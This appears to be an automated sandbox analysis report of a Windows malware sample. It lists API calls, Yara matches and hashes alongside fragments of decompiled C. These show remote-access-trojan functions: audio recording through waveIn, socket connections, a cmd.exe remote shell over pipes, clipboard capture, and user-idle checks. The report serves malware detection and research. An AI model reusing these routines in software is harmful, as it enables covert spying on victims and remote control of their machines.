                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                        • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                        • String ID:
                                        • API String ID: 1823182134-0
                                        • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                        • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                        • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                        • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                        • String ID:
                                        • API String ID: 1976170855-0
                                        • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                        • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                        • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                        • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                        • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                        • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                          • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                        Strings
                                        • invalid vector<T> subscript, xrefs: 004018A2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                        • String ID: invalid vector<T> subscript
                                        • API String ID: 1986322901-3016609489
                                        • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                        • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                        • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                        • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                        • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                        • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                        Strings
                                        • invalid vector<T> subscript, xrefs: 00405019
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                        • String ID: invalid vector<T> subscript
                                        • API String ID: 3609083747-3016609489
                                        • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                        • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                        • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                        • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00412019() {
                                        				_Unknown_base(*)()* _t2;
                                        
                                        				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                        				 *0x41c1dc = _t2;
                                        				return _t2;
                                        			}

                                        Instruction offsets: 0x0041202f, 0x00412035, 0x0041203a

                                        APIs
                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetLastInputInfo$User32.dll
                                        • API String ID: 2574300362-1519888992
                                        • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                        • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                        • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                        • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040F4AE() {
                                        				_Unknown_base(*)()* _t2;
                                        
                                        				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                                        				 *0x41bf1c = _t2;
                                        				return _t2;
                                        			}

                                        Instruction offsets: 0x0040f4c4, 0x0040f4ca, 0x0040f4cf

                                        APIs
                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetCursorInfo$User32.dll
                                        • API String ID: 1646373207-2714051624
                                        • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                        • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                        • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                        • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00413AED() {
                                        				_Unknown_base(*)()* _t2;
                                        
                                        				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                        				 *0x41c1f8 = _t2;
                                        				return _t2;
                                        			}

                                        Instruction offsets: 0x00413b03, 0x00413b09, 0x00413b0e

                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                        • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetConsoleWindow$kernel32.dll
                                        • API String ID: 2574300362-100875112
                                        • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                        • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                        • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                        • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
                                        				int _v8;
                                        				int _v12;
                                        				char* _t31;
                                        				signed int _t36;
                                        				signed int _t37;
                                        				void* _t46;
                                        
                                        				_v8 = 0;
                                        				_t31 = 0x415664;
                                        				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
                                        					_t31 = malloc(_v8);
                                        					_t36 = _v8;
                                        					_t46 = _t31;
                                        					_t37 = _t36 >> 2;
                                        					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
                                        					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
                                        				}
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
                                        				return _a4;
                                        			}










                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                        • malloc.MSVCRT ref: 0040B64B
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                        • String ID:
                                        • API String ID: 3506253819-0
                                        • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                        • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                        • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                        • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                        • String ID:
                                        • API String ID: 182292213-0
                                        • Opcode ID: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                        • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                        • Opcode Fuzzy Hash: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                        • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E00401181(void* __eflags, signed int _a4) {
                                        				intOrPtr _t16;
                                        				intOrPtr _t17;
                                        				intOrPtr _t19;
                                        				intOrPtr _t22;
                                        				intOrPtr _t28;
                                        				intOrPtr _t29;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				intOrPtr _t32;
                                        				intOrPtr _t33;
                                        				signed int _t36;
                                        
                                        				_t38 = __eflags;
                                        				E0040180C(0x41b200, __eflags, _a4);
                                        				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
                                        				_t36 = _a4 << 5;
                                        				_t16 = E0040180C(0x41b200, _t38, _a4);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t28 =  *0x41b1dc; // 0x2d82948
                                        				 *((intOrPtr*)(_t36 + _t28)) = _t16;
                                        				_t17 =  *0x41b1dc; // 0x2d82948
                                        				_t29 =  *0x41b1d4; // 0x0
                                        				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
                                        				_t30 =  *0x41b1dc; // 0x2d82948
                                        				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
                                        				_t31 =  *0x41b1dc; // 0x2d82948
                                        				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
                                        				_t32 =  *0x41b1dc; // 0x2d82948
                                        				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
                                        				_t33 =  *0x41b1dc; // 0x2d82948
                                        				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
                                        				_t19 =  *0x41b1dc; // 0x2d82948
                                        				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
                                        				_t22 =  *0x41b1dc; // 0x2d82948
                                        				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
                                        			}















                                        APIs
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                        • waveInPrepareHeader.WINMM(02D82948,00000020,?,?,0040116A,00000000), ref: 0040120D
                                        • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                        • String ID:
                                        • API String ID: 1952094867-0
                                        • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                        • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                        • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                        • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 18%
                                        			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
                                        				int _v8;
                                        				char _v2056;
                                        
                                        				_v8 = 0x400;
                                        				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
                                        					_push( &_a15);
                                        					_push(0x415800);
                                        				} else {
                                        					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
                                        					RegCloseKey(_a8);
                                        					_push( &_a15);
                                        					_push( &_v2056);
                                        				}
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
                                        				return _a4;
                                        			}






                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                        • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                        • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                        • String ID:
                                        • API String ID: 4081865614-0
                                        • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                        • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                        • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                        • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0040D87E() {
                                        				char _t9;
                                        				void* _t22;
                                        				void* _t28;
                                        				intOrPtr _t29;
                                        
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
                                        				_t29 =  *0x41b889; // 0x0
                                        				if(_t29 == 0) {
                                        					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        					E00402B8A(_t9);
                                        				}
                                        				E004017DD(_t22 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}








                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                          • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                          • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                          • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                          • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                          • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                          • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                          • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                          • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                          • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                          • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                        • String ID:
                                        • API String ID: 187635395-0
                                        • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                        • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                        • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                        • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 384503197-0
                                        • Opcode ID: 2dfa9e07ec5e251ddcfc6defdda0276f547ce66a674e16cb6872e78d440df24c
                                        • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                        • Opcode Fuzzy Hash: 2dfa9e07ec5e251ddcfc6defdda0276f547ce66a674e16cb6872e78d440df24c
                                        • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                        • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                        • String ID:
                                        • API String ID: 3911305588-0
                                        • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                        • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                        • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                        • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E0040DCD4() {
                                        				void* _t15;
                                        				intOrPtr _t19;
                                        
                                        				E0040AC8C();
                                        				exit(0);
                                        				while(1) {
                                        					_t19 =  *0x41beb8; // 0x0
                                        					if(_t19 == 0) {
                                        						break;
                                        					}
                                        					Sleep(0x64);
                                        				}
                                        				E00408245();
                                        				E004017DD(_t15 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
